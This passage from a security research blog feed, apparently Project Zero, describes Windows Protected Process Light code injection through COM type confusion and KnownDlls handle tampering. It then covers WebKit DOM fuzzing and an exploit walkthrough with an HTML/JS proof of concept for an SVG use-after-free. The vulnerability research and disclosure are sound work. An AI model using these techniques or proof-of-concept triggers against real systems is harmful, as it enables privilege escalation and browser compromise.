At this point I realized there was a problem with the approach of relying on the signing certificate, there’s a lot of binaries I expected to be allowed to run as PP or PPL which were missing from the list I generated. As PP was originally designed for DRM there was no obvious executable to handle the Protected Media Path such as AUDIODG.EXE. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis, just start protected every executable I could enumerate and query the protection level granted. I wrote the following script to test a single executable:
Import-Module NtObjectManager
function Test-ProtectedProcess {    [CmdletBinding()]    param(        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]        [string]$FullName,        [NtApiDotNet.PsProtectedType]$ProtectedType = 0,        [NtApiDotNet.PsProtectedSigner]$ProtectedSigner = 0        )    BEGIN {        $config = New-NtProcessConfig abc -ProcessFlags ProtectedProcess `            -ThreadFlags Suspended -TerminateOnDispose `            -ProtectedType $ProtectedType `            -ProtectedSigner $ProtectedSigner    }
   PROCESS {        $path = Get-NtFilePath $FullName        Write-Host $path        try {            Use-NtObject($p = New-NtProcess $path -Config $config) {                $prot = $p.Process.Protection                $props = @{                    Path=$path;                    Type=$prot.Type;                    Signer=$prot.Signer;                    Level=$prot.Level.ToString("X");                }                $obj = New-Object –TypeName PSObject –Prop $props                Write-Output $obj            }        } catch {        }    }}
When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks, for example SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is using the native process creation APIs it’s possible to start a DLL as main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.
PathSigning LevelC:\windows\Microsoft.Net\Framework\v4.0.30319\mscorsvw.exeCodeGenC:\windows\Microsoft.Net\Framework64\v4.0.30319\mscorsvw.exeCodeGenC:\windows\system32\SecurityHealthService.exeWindowsC:\windows\system32\svchost.exeWindowsC:\windows\system32\xbgmsvc.exeWindowsC:\windows\system32\csrss.exeWindows TCBC:\windows\system32\services.exeWindows TCBC:\windows\system32\smss.exeWindows TCBC:\windows\system32\werfaultsecure.exeWindows TCBC:\windows\system32\wininit.exeWindows TCBInjecting Arbitrary Code Into NGENAfter carefully reviewing the list of executables which run as PPL I settled on trying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:
  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary, specifically it doesn’t meet my own criteria that I get the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL as shown below:
NTSTATUS CiSetFileCache(HANDLE Handle, ...) {

 PFILE_OBJECT FileObject;
 ObReferenceObjectByHandle(Handle, &FileObject);

 if (FileObject->SharedWrite ||
    (FileObject->WriteAccess &&
     PsGetProcessProtection().Type != PROTECTED_LIGHT)) {
   return STATUS_SHARING_VIOLATION;
 }

 // Continue setting file cache.
}
If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.
To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly, instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:
C:\> NGEN install c:\some\binary.dll
Results in the following command line being executed:
MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe D
A, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that  named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:
void NGenWorkerEmbedding(HANDLE hPipe) {
 CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED);
 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE, &pStm);
 CoMarshalInterface(pStm, &IID_IClassFactory, &factory,                     MSHCTX_LOCAL, nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm, &length);
 WriteFile(hPipe, &length, sizeof(length));
 WriteFile(hPipe, buffer, length);
 CloseHandle(hPipe);

 // Set event to synchronize with parent.
 SetEvent(hStartupEvent);

 // Pump message loop to handle COM calls.
 MessageLoop();

 // ...
}
This code is not quite what I expected. Rather than using the named pipe for the entire communication channel it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance, normally you’d register the factory using CoRegisterClassObject but that would make it accessible to all processes at the same security level so instead by using marshaling the connection can be left private only to the NGEN binary which spawned MSCORSVW. A .NET related process using COM gets me interested as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET, we can determine if it is implemented in .NET by querying for its interfaces, for example we use the Get-ComInterface command in my OleViewDotNet PowerShell module as shown in the following screenshot.

We’re out of luck, this object is not implemented in .NET, as you’d at least expect to see an instance of the _Object interface. There’s only one interface implemented, ICorSvcBindToWorker so let’s dig into that interface to see if there’s anything we can exploit.
Something caught my eye, in the screenshot there’s a HasTypeLib column, for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is rather than the interface’s proxy code being implemented using an predefined NDR byte stream it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as issue 1112. In the issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is a normal proxy would be loaded as a DLL which means that it must meet the PPL signing level requirements; however a type library is just data so can be loaded into a PPL without any signing level violations.
How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:
interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
             [in] BSTR pRuntimeVersion,
             [in] unsigned long ParentProcessID,
             [in] BSTR pInterruptEventName,
             [in] ICorSvcLogger* pCorSvcLogger,
             [out] ICorSvcWorker** pCorSvcWorker);
};
The single BindToRuntimeWorker takes 5 parameters, 4 are inbound and 1 is outbound. When trying to access the method over DCOM from our untrusted process the system will automatically generate the proxy and stub for the call. This will include marshaling COM interface parameters into a buffer, sending the buffer to the remote process and then unmarshaling to a pointer before calling the real function. For example imagine a simpler function, DoSomething which takes a single IUnknown pointer. The marshaling process looks like the following:
The operation of the method call is as follow:
  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can’t modify we can just replace the registration for it in the current user’s registry hive, or use the same ROT trick from before issue 1112. For example if we modifying the type library to pass an integer instead of an interface pointer we get the following:
The operation of the marshal now changes as follows:
  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implement method inside the server, passing the integer as the parameter. However DoSomething hasn’t changed, it’s still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:
struct FakeObject {
   BSTR FakeVTable;
};
If we pass a pointer to a FakeObject instead of the interface pointer the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs so this will create a pointer to an object, which contains a pointer to an arbitrary byte array which can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.
To fully exploit this we’d need to call a suitable method, probably running a ROP chain and we might also have to bypass CFG. That all sounds too much like hard work, so instead I’ll take a different approach to get arbitrary code running in the PPL binary, by abusing KnownDlls.KnownDlls and Protected Processes.In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator to PPL code injection as PPL will also load DLLs from the system’s KnownDlls location. As the code signing check is performed during section creation not section mapping as long as you can place an entry into KnownDlls you can load anything into a PPL even unsigned code.
This doesn’t immediately seem that useful, we can’t write to KnownDlls without being an administrator, and even then without some clever tricks. However it’s worth looking at how a Known DLL is loaded to get an understanding on how it can be abused. Inside NTDLL’s loader (LDR) code is the following function to determine if there’s a preexisting Known DLL.
NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle) {
 // If KnownDll directory handle not open then return error.
 if (!LdrpKnownDllDirectoryHandle)
   return STATUS_DLL_NOT_FOUND;

 OBJECT_ATTRIBUTES ObjectAttributes;
 InitializeObjectAttributes(&ObjectAttributes,
   &DllName,
   OBJ_CASE_INSENSITIVE,
   LdrpKnownDllDirectoryHandle,
   nullptr);

 return NtOpenSection(SectionHandle,
                      SECTION_ALL_ACCESS,
                      &ObjectAttributes);
}
The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn’t open an absolute path, instead it uses the feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to only specify the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path as the lookup with be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle we can find it’s initialized in LdrpInitializeProcess as follows:
NTSTATUS LdrpInitializeProcess() {
 // ...
 PPEB peb = // ...
 // If a full protected process don't use KnownDlls.
 if (peb->IsProtectedProcess && !peb->IsProtectedProcessLight) {
   LdrpKnownDllDirectoryHandle = nullptr;
 } else {
   OBJECT_ATTRIBUTES ObjectAttributes;
   UNICODE_STRING DirName;
   RtlInitUnicodeString(&DirName, L"\\KnownDlls");
   InitializeObjectAttributes(&ObjectAttributes,
                              &DirName,
                              OBJ_CASE_INSENSITIVE,
                              nullptr, nullptr);
   // Open KnownDlls directory.
   NtOpenDirectoryObject(&LdrpKnownDllDirectoryHandle,
                         DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
                         &ObjectAttributes);
}
This code shouldn’t be that unexpected, the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in the LdrpKnownDllDirectoryHandle global variable for later use. It’s worth noting that this code checks the PEB to determine if the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.
How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution resulting in a data only attack. As we can inherit any handles we like into the new PPL process we can setup an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP or bypassing CFG.
All we need is a suitable primitive to write an arbitrary value, unfortunately while I could find methods which would cause an arbitrary write I couldn’t sufficiently control the value being written. In the end I used the following interface and method which was implemented on the object returned by ICorSvcBindToWorker::BindToRuntimeWorker.
interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
           [in] OptimizationScenario scenario,
           [in] ICorSvcLogger* pCorSvcLogger,
           [out] long* pCanContinue);
};
In the implementation of CanReuseProcess the target value of pCanContinue is always initialized to 0. Therefore by replacing the [out] long* in the type library definition with [in] long we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process’ handle table with handles to a fake KnownDlls directory we can be sure of an alias between the real KnownDlls which will be opened once the process starts and our fake ones by just modifying the top 16 bits of the handle to 0. This is shown in the following diagram:

Once we’ve overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64 bit mode, so we won’t overwrite anything important) LdrpKnownDllDirectoryHandle now points to one of our fake KnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method and we’ll get arbitrary code execution inside the PPL.Elevating to PPL-Windows TCBWe can’t stop here, attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that generating a fake cached signed DLL should run in a PPL as well as Microsoft leaving a backdoor for PPL processes at any signing level I converted my C# code from Issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE which will run as PPL Windows TCB we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier, however it didn’t work on 1803. Clearly Microsoft had changed the behavior of cached signing level in some way, perhaps they’d removed its trust in PPL entirely. That seemed unlikely as it would have a negative performance impact.
After discussing this a bit with Alex Ionescu I decided to put together a quick parser with information from Alex for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02), however for the system binary PowerShell couldn’t decode the enumeration and so just outputs the integer value of 66 which is 0x42 in hex. The value 0x40 was an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn’t be loaded into a PPL process. Something must be setting this flag so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that first the kernel queries for the Extended Attributes (EA) from the DLL. The cached signing level data is stored in the file’s EA so this is almost certainly an indication of the cached signing level being read. In the full trace artifacts of checking the full signature are shown such as enumerating catalog files, I’ve removed those artifacts from the screenshot for brevity. Finally the EA is set, if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically, the question is how? By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace we can see the call to CipSetFileCache originates from the call to NtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL so that subsequent image mapping don’t need to recheck the signature. It’s possible to map an image section from a file with write access so we can reuse the same attack from Issue 1332 and replace the call to NtSetCachedSigningLevel with NtCreateSection and we can fake sign any DLL. It turned out that the call to set the file cache happened after the write check introducted to fix Issue 1332 and so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as Issue 1597 which was fixed in September 2018 as CVE-2018-8449. However, as with Issue 1332 the back door for PPL is still in place so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB. ConclusionsThis blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this new found power? Actually not a great deal as a normal user but there are some parts of the OS, such as the Windows Store which rely on PPL to secure files and resources which you can’t modify as a normal user. If you elevate to administrator and then inject into a PPL you’ll get many more things to attack such as CSRSS (through which you can certainly get kernel code execution) or attack Windows Defender which runs as PPL Anti-Malware. Over time I’m sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.
Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues only affecting PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE. The issue will not be fixed in current versions of Windows although it might be fixed in the next major version. Previously confirming Microsoft’s policy on fixing a particular security issue was based on precedent, however they’ve recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria which, as shown below for Protected Process Light, Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe to only affect PP or PPL.

The one bug I reported to Microsoft was only fixed because it could be used to bypass Device Guard. When you think about it, only fixing for Device Guard is somewhat odd. I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won’t fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document really helps to clarify what Microsoft will and won’t fix it’s still somewhat arbitrary. A secure feature is rarely secure in isolation, the feature is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.
Categories: Security

365 Days Later: Finding and Exploiting Safari Bugs using Publicly Available Tools

Thu, 10/04/2018 - 12:40
Posted by Ivan Fratric, Google Project Zero
Around a year ago, we published the results of research about the resilience of modern browsers against DOM fuzzing, a well-known technique for finding browser bugs. Together with the bug statistics we also published Domato, our DOM fuzzing tool that was used to find those bugs.
Given that in the previous research, Apple Safari, or more specifically, WebKit (its DOM engine) did noticeably worse than other browsers, we decided to revisit it after a year using exactly the same methodology and exactly the same tools to see whether anything changed.
Test Setup
As in the original research, the fuzzing was initially done against WebKitGTK+ and then all the crashes were tested against Apple Safari running on a Mac. This makes the fuzzing setup easier as WebKitGTK+ uses the same DOM engine as Safari, but allows for fuzzing on a regular Linux machine. In this research, WebKitGTK+ version 2.20.2 was used which can be downloaded here.
To improve the fuzzing process, a couple of custom changes were made to WebKitGTK+:
  • Made fixes to be able to build WebKitGTK+ with ASan (Address Sanitizer).

  • Changed window.alert() implementation to immediately call the garbage collector instead of displaying a message window. This works well because window.alert() is not something we would normally call during fuzzing.

  • Normally, when a DOM bug causes a crash, due to the multi-process nature of WebKit, only the web process would crash, but the main process would continue running. Code was added that monitors a web process and, if it crashes, the code would “crash” the main process with the same status.

  • Created a custom target binary.

After the previous research was published, we got a lot of questions about the details of our fuzzing setup. This is why, this time, we are publishing the changes made to the WebKitGTK+ code as well as the detailed build instructions below. A patch file can be found here. Note that the patch was made with WebKitGTK+ 2.20.2 and might not work as is on other versions.
Once WebKitGTK+ code was prepared, it was built with ASan by running the following commands from the WebKitGTK+ directory:
export CC=/usr/bin/clangexport CXX=/usr/bin/clang++export CFLAGS="-fsanitize=address"export CXXFLAGS="-fsanitize=address"export LDFLAGS="-fsanitize=address"export ASAN_OPTIONS="detect_leaks=0"
mkdir buildcd build
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=. -DCMAKE_SKIP_RPATH=ON -DPORT=GTK -DLIB_INSTALL_DIR=./lib -DUSE_LIBHYPHEN=OFF -DENABLE_MINIBROWSER=ON -DUSE_SYSTEM_MALLOC=ON -DENABLE_GEOLOCATION=OFF -DENABLE_GTKDOC=OFF -DENABLE_INTROSPECTION=OFF -DENABLE_OPENGL=OFF -DENABLE_ACCELERATED_2D_CANVAS=OFF -DENABLE_CREDENTIAL_STORAGE=OFF -DENABLE_GAMEPAD_DEPRECATED=OFF -DENABLE_MEDIA_STREAM=OFF -DENABLE_WEB_RTC=OFF -DENABLE_PLUGIN_PROCESS_GTK2=OFF -DENABLE_SPELLCHECK=OFF -DENABLE_VIDEO=OFF -DENABLE_WEB_AUDIO=OFF -DUSE_LIBNOTIFY=OFF -DENABLE_SUBTLE_CRYPTO=OFF -DUSE_WOFF2=OFF -Wno-dev ..
make -j 4
mkdir -p libexec/webkit2gtk-4.0cp bin/WebKit*Process libexec/webkit2gtk-4.0/
If you are doing this for the first time, the cmake/make step will likely complain about missing dependencies, which you will then have to install. You might note that a lot of features deemed not overly important for DOM fuzzing were disabled via -DENABLE flags. This was mainly to save us from having to install the corresponding dependencies but in some cases also to create a build that was more “portable”.
After the build completes, the fuzzing is as simple as creating a sample with Domato, running the target binary as
ASAN_OPTIONS=detect_leaks=0,exitcode=42 ASAN_SYMBOLIZER_PATH=/path/to/llvm-symbolizer LD_LIBRARY_PATH=./lib ./bin/webkitfuzz /path/to/sample <timeout>
and waiting for the exit code 42 (which, if you take a look at the command line above as well as the changes we made to the WebKitGTK+ code, indicates an ASan crash).
After collecting crashes, an ASan build of the most recent WebKit source code was created on the actual Mac hardware. This is as simple as running
./Tools/Scripts/set-webkit-configuration --release --asan./Tools/Scripts/build-webkit
Each crash obtained on WebKitGTK+ was tested against the Mac build before reporting to Apple.
The Results
After running the fuzzer for 100.000.000 iterations (the same as a year ago) I ended up with 9 unique bugs that were reported to Apple. Last year, I estimated that the computational power to perform this number of iterations could be purchased for about $1000 and this probably hasn’t changed - an amount well within the payment range of a wide range of attackers with varying motivation.
The bugs are summarized in the table below. Please note that all of the bugs have been fixed at the time of release of this blog post.
Project Zero bug IDCVETypeAffected Safari 11.1.2Older than 6 monthsOlder than 1 year1593CVE-2018-4197UAFYESYESNO1594CVE-2018-4318UAFNONONO1595CVE-2018-4317UAFNOYESNO1596CVE-2018-4314UAFYESYESNO1602CVE-2018-4306UAFYESYESNO1603CVE-2018-4312UAFNONONO1604CVE-2018-4315UAFYESYESNO1609CVE-2018-4323UAFYESYESNO1610CVE-2018-4328OOB readYESYESYESUAF = use-after-free. OOB = out-of-bounds
As can be seen in the table, out of the 9 bugs found, 6 affected the release version of Apple Safari, directly affecting Safari users.
While 9 or 6 bugs (depending how you count) is significantly less than the 17 found a year ago, it is still a respectable number of bugs, especially if we take into an account that the fuzzer has been public for a long time now.
After the results were in, I looked into how long these bugs have been in the WebKit codebase. To check this, all the bugs were tested against a version of WebKitGTK+ that was more than 6 months old (WebKitGTK+ 2.19.6) as well as a version that was more than a year old (WebKitGTK+ 2.16.6).
The results are interesting—most of the bugs were sitting in the WebKit codebase for longer than 6 months, however, only 1 of them is older than 1 year. Here, it might be important to note that throughout the past year (between the previous and this blog post) I also did fuzzing runs using the same approach and reported 14 bugs. Unfortunately, it is impossible to know how many of those 14 bugs would have survived until now and how many would have been found in this fuzz run. It is also possible that some of the newly found bugs are actually older, but don’t trigger with the provided PoCs is in the older versions due to unrelated code changes in the DOM. I didn’t investigate this possibility.
However, even if we assume that all of the previously reported bugs would not have survived until now, the results still indicate that (a) the security vulnerabilities keep getting introduced in the WebKit codebase and (b) many of those bugs get incorporated into the release products before they are caught by internal security efforts.
While (a) is not unusual for any piece of software that changes as rapidly as a DOM engine, (b) might indicate the need to put more computational resources into fuzzing and/or review before release.
The Exploit
To prove that bugs like this can indeed lead to a browser compromise, I decided to write an exploit for one of them. The goal was not to write a very reliable or sophisticated exploit - highly advanced attackers would likely not choose to use the bugs found by public tools whose lifetime is expected to be relatively short. However, if someone with exploit writing skills was to use such a bug in, for example, a malware spreading campaign, they could potentially do a lot of damage even with an unreliable exploit.
Out of the 6 issues affecting the release version of Safari, I selected what I believed to be the easiest one to exploit—a use-after-free where, unlike in the other use-after-free issues found, the freed object is not on the isolated heap—a mitigation recently introduced in WebKit to make use-after-free exploitation harder.
Let us first start by examining the bug we’re going to exploit. The issue is a use-after-free in the SVGAnimateElementBase::resetAnimatedType() function. If you look at the code of the function, you are going to see that, first, the function gets a raw pointer to the SVGAnimatedTypeAnimator object on the line
   SVGAnimatedTypeAnimator* animator = ensureAnimator();
and, towards the end of the function, the animator object is used to obtain a pointer to a SVGAnimatedType object (unless one already exists) on the line
   m_animatedType = animator->constructFromString(baseValue);
The problem is that, in between these two lines, attacker-controlled JavaScript code could run. Specifically, this could happen during a call to computeCSSPropertyValue(). The JavaScript code could then cause SVGAnimateElementBase::resetAnimatedPropertyType() to be called, which would delete the animator object. Thus, the constructFromString() function would be called on the freed animator object - a typical use-after-free scenario, at least on the first glance. There is a bit more to this bug though, but we’ll get to that later.
The vulnerability has been fixed in the latest Safari by no longer triggering JavaScript callbacks through computeCSSPropertyValue(). Instead, the event handler is going to be processed at some later time. The patch can be seen here.
A simple proof of concept for the vulnerability is:
<body onload="setTimeout(go, 100)">  <svg id="svg">    <animate id="animate" attributeName="fill" />  </svg>  <div id="inputParent" onfocusin="handler()">    <input id="input">  </div>  <script>    function handler() {      animate.setAttribute('attributeName','fill');    }    function go() {      input.autofocus = true;      inputParent.after(inputParent);      svg.setCurrentTime(1);    }  </script></body>
Here, svg.setCurrentTime() results in resetAnimatedType() being called, which in turn, due to DOM mutations made previously, causes a JavaScript event handler to be called. In the event handler, the animator object is deleted by resetting the attributeName attribute of the animate element.
Since constructFromString() is a virtual method of the SVGAnimatedType class, the primitive the vulnerability gives us is a virtual method call on a freed object.
In the days before ASLR, such a vulnerability would be immediately exploitable by replacing the freed object with data we control and faking the virtual method table of the freed object, so that when the virtual method is called, execution is redirected to the attacker’s ROP chain. But due to ASLR we won’t know the addresses of any executable modules in the process.
A classic way to overcome this is to combine such a use-after-free bug with an infoleak bug that can leak an address of one of the executable modules. But, there is a problem: In our crop of bugs, there wasn’t a good infoleak we could use for this purpose. A less masochistic vulnerability researcher would simply continue to run the fuzzer until a good infoleak bug would pop up. However, instead of finding better bugs, I deliberately wanted to limit myself to just the bugs found in the same number of iterations as in the previous research. As a consequence, the majority of time spent working on this exploit was to turn the bug into an infoleak.
As stated before, the primitive we have is a virtual method call on the freed object. Without an ASLR bypass, the only thing we can do with it that would not cause an immediate crash is to replace the freed object with another object that also has a vtable, so that when a virtual method is called, it is called on the other object. Most of the time, this would mean calling a valid virtual method on a valid object and nothing interesting would happen. However, there are several scenarios where doing this could lead to interesting results:
  1. The virtual method could be something dangerous to call out-of-context. For example, if we can call a destructor of some object, its members could get freed while the object itself continues to live. With this, we could turn the original use-after-free issue into another use-after-free issue, but possibly one that gives us a better exploitation primitive.

  1. Since constructFromString() takes a single parameter of the type String, we could potentially cause a type confusion on the input parameter if the other virtual method expects a parameter of another type. Additionally, if the other virtual method takes more parameters than constructFromString(), these would be uninitialized which could also lead to exploitable behavior.

  1. As constructFromString() is expected to return a pointer of type SVGAnimatedType, if the other virtual method returns some other type, this will lead to the type confusion on the return value. Additionally, if the other virtual method does not return anything, then the return value remains uninitialized.

  1. If the vtables of the freed object and the object we replaced it with are of different size, calling a vtable pointer on the freed object could result in an out-of-bounds read on the vtable of the other object, resulting in calling a virtual function of some third class.

In this exploit we used option 3, but with a twist. To understand what the twist is, let’s examine the SVGAnimateElementBase class more closely: It implements (most of) the functionality of the SVG <animate> element. The SVG <animate> element is used to, as the name suggests, animate a property of another element. For example, having the following element in an SVG image
<animate attributeName="x" from="0" to="100" dur="10s" />
will cause the x coordinate of the target element (by default, the parent element) to grow from 0 to 100 over the duration of 10 seconds. We can use an <animate> element to animate various CSS or XML properties, which is controlled by the attributeName property of the <animate> element.
Here’s the interesting part: These properties can have different types. For example, we might use an <animate> element to animate the x coordinate of an element, which is of type SVGLengthValue (number + unit), or we might use it to animate the fill attribute, which is of type Color.
In an SVGAnimateElementBase class, the type of animated property is tracked via a member variable declared as
   AnimatedPropertyType m_animatedPropertyType;
Where AnimatedPropertyType is the enumeration of possible types. Two other member variables of note are
   std::unique_ptr<SVGAnimatedTypeAnimator> m_animator;    std::unique_ptr<SVGAnimatedType> m_animatedType;
The m_animator here is the use-after-free object, while m_animatedType is the object created from the (possibly freed) m_animator.
SVGAnimatedTypeAnimator (type of m_animator) is a superclass which has subclasses for all possible values of AnimatedPropertyType, such as SVGAnimatedBooleanAnimator, SVGAnimatedColorAnimator etc. SVGAnimatedType (type of m_animatedType) is a variant that contains a type and a union of possible values depending on the type.
The important thing to note is that normally, both the subclass of m_animator and the type of m_animatedType are supposed to match m_animatedPropertyType. For example, if m_animatedPropertyType is AnimatedBoolean, then the type of m_animatedType variant should be the same, and m_animator should be an instance of SVGAnimatedBooleanAnimator.
After all, why shouldn’t all these types match, since m_animator is created based on m_animatedPropertyType here and m_animatedType is created by m_animator here. Oh wait, that’s exactly where the vulnerability occurs!
So instead of replacing a freed animator with something completely different and causing a type confusion between SVGAnimatedType and another class, we can instead replace the freed animator with another animator subclass and confuse SVGAnimatedType with type = A to another SVGAnimatedType with type = B.
But one interesting thing about this bug is that it would still be a bug even if the animator object did not get freed. In that case, the bug turns into a type confusion: To trigger it, one would simply change the m_animatedPropertyType of the <animate> element to a different type in the JavaScript callback (we’ll examine how this happens in detail later). This led to some discussion in the office whether the bug should be called an use-after-free at all, or is this really a different type of bug where the use-after-free is merely a symptom.
Note that the animator object is always going to get freed as soon as the type of the <animate> element changes, which leads to an interesting scenario where to exploit a bug (however you choose to call it), instead of replacing the freed object with an object of another type, we could either replace it with the object of the same type or make sure it doesn’t get replaced at all. Due to how memory allocation in WebKit works, the latter is actually going to happen on its own most of the time anyway - objects allocated in a memory page will only start getting replaced once the whole page becomes full. Additionally, freeing an object in WebKit doesn’t corrupt it as would be the case in some other allocators, which allows us to still use it normally even after being freed.
Let’s now examine how this type confusion works and what effects it has:
  1. We start with an <animate> element for type A. m_animatedPropertyType, m_animator and m_animatedType all match type A.

  1. resetAnimatedType() gets called and it retrieves an animator pointer of type A here.

